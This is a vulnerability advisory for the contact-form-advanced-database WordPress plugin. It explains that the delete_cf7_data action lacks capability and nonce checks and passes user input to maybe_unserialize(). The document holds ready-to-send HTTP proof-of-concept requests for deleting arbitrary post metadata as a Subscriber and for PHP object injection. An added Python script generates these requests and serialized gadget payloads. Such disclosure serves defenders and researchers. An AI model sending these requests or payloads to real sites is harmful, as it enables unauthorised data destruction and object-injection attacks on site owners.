The plugin lacks both authorisation and CSRF checks in its delete_cf7_data and export_cf7_data AJAX actions. Both actions are registered for any authenticated user, so an account with a role as low as Subscriber can call them. delete_cf7_data allows arbitrary post metadata deletion and, because the user-supplied value is passed to the maybe_unserialize() function without being validated first, PHP Object Injection if a suitable gadget chain is present in another installed plugin.
To delete the _edit_lock metadata of the post ID 18:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data%5b0%5d%5bid%5d=18&data%5b0%5d%5bkey%5d=_edit_lock
```

To prove the object injection, we inserted a new class in the plugin file:

```php
class InjectionPoint { public function __destruct() { die("OBJECT INJECTION"); } }
```

and sent the serialized object `O:14:"InjectionPoint":0:{}` base64-encoded in the val field:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Connection: close
Cookie: [any authenticated user]

action=delete_cf7_data&data[0][id]=1&data[0][key]=test&data[0][val]=TzoxNDoiSW5qZWN0aW9uUG9pbnQiOjA6e30=
```
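The following Python script is an added worked example, not part of the original advisory or of the plugin's code. It rebuilds the two PoC requests above from scratch: it serializes the gadget class in PHP's serialize() format, base64-encodes it the way the PoC does (the PoC implies that the plugin base64-decodes data[0][val] before calling maybe_unserialize(); that is an assumption here, not something the advisory states), computes a correct Content-Length, and includes a port of WordPress's is_serialized(), which is the only check maybe_unserialize() performs before handing the string to unserialize(). The host and cookie values are placeholders.

```python
"""Rebuilds the delete_cf7_data PoC requests from the advisory above.

Added example; not the plugin's or the advisory author's code.
"""
import base64
import re
from typing import Optional
from urllib.parse import urlencode

AJAX_PATH = "/wp-admin/admin-ajax.php"


def php_serialize_object(class_name: str, props: Optional[dict] = None) -> str:
    """Serialize an object the way PHP's serialize() does: O:len:"Class":n:{...}.

    Only string and int properties are handled; a bare gadget such as the
    advisory's InjectionPoint class has none and serializes to
    O:14:"InjectionPoint":0:{}.
    """
    props = props or {}
    out = [f'O:{len(class_name.encode())}:"{class_name}":{len(props)}:{{']
    for name, value in props.items():
        out.append(f's:{len(name.encode())}:"{name}";')
        if isinstance(value, int):
            out.append(f"i:{value};")
        else:
            out.append(f's:{len(str(value).encode())}:"{value}";')
    out.append("}")
    return "".join(out)


def object_injection_value(class_name: str) -> str:
    """data[0][val] as sent in the PoC: base64 of the serialized gadget.

    Assumption: the plugin base64-decodes val before maybe_unserialize().
    """
    return base64.b64encode(php_serialize_object(class_name).encode()).decode()


def delete_cf7_data_body(post_id: int, meta_key: str, val: Optional[str] = None) -> str:
    """Form body for the delete_cf7_data action.

    Brackets are percent-encoded as jQuery does; PHP parses data[0][id] and
    friends into a nested array whether or not they are encoded.
    """
    fields = [("action", "delete_cf7_data"),
              ("data[0][id]", str(post_id)),
              ("data[0][key]", meta_key)]
    if val is not None:
        fields.append(("data[0][val]", val))
    return urlencode(fields)


def raw_request(body: str, cookie: str, host: str = "target.example") -> str:
    """Full HTTP/1.1 request text with a correct Content-Length.

    host and cookie are placeholders supplied by the caller.
    """
    headers = [
        f"POST {AJAX_PATH} HTTP/1.1",
        f"Host: {host}",
        "Accept: application/json, text/javascript, */*; q=0.01",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        f"Content-Length: {len(body.encode())}",
        "Connection: close",
        f"Cookie: {cookie}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def wp_is_serialized(data: str, strict: bool = True) -> bool:
    """Port of WordPress is_serialized().

    maybe_unserialize() calls unserialize() only when this returns True, so
    it is the sole gate the injected value has to pass. It checks the shape
    of the string, not which class is named, so any well-formed O:... passes.
    """
    data = data.strip()
    if data == "N;":
        return True
    if len(data) < 4 or data[1] != ":":
        return False
    if strict and data[-1] not in ";}":
        return False
    token = data[0]
    if token == "s":
        if strict and data[-2] != '"':
            return False
        if not strict and '"' not in data:
            return False
    if token in ("s", "a", "O", "E"):
        return re.match(rf"^{token}:[0-9]+:", data, re.S) is not None
    if token in ("b", "i", "d"):
        end = "$" if strict else ""
        return re.match(rf"^{token}:[0-9.E+-]+;{end}", data) is not None
    return False


if __name__ == "__main__":
    cookie = "wordpress_logged_in_<hash>=<subscriber session>"  # placeholder
    print(raw_request(delete_cf7_data_body(18, "_edit_lock"), cookie))
    print()
    val = object_injection_value("InjectionPoint")
    print(raw_request(delete_cf7_data_body(1, "test", val), cookie))
    decoded = base64.b64decode(val).decode()
    print("\nserver-side view of val:", decoded,
          "-> is_serialized:", wp_is_serialized(decoded))
```

The first body comes out at 77 bytes, matching the Content-Length in the advisory's request, and the generated val is byte-for-byte the string in the second request. The is_serialized() port makes the root cause concrete: the only thing standing between the Subscriber's input and unserialize() is a format check that any well-formed serialized object satisfies, which is why validating the value (or never unserializing user input at all) is needed in addition to the missing capability and nonce checks.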
| CPE | Name | Operator | Version |
|---|---|---|---|
| | contact-form-advanced-database | eq | * |